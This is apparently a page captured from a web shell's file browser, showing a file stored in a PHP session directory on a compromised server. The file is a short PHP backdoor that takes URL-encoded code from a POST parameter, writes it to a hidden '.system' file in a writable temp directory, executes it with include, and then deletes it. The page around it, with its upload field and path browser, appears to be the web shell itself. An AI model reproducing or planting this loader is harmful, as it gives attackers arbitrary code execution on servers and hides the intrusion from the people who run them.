Your IP : 216.73.216.5


Current Path : /proc/thread-self/root/opt/alt/php74/var/lib/php/session/
Upload File :
Current File : //proc/thread-self/root/opt/alt/php74/var/lib/php/session/bdCGU1JJ5Eau44

<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode($_POST["gR"]);foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.system";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");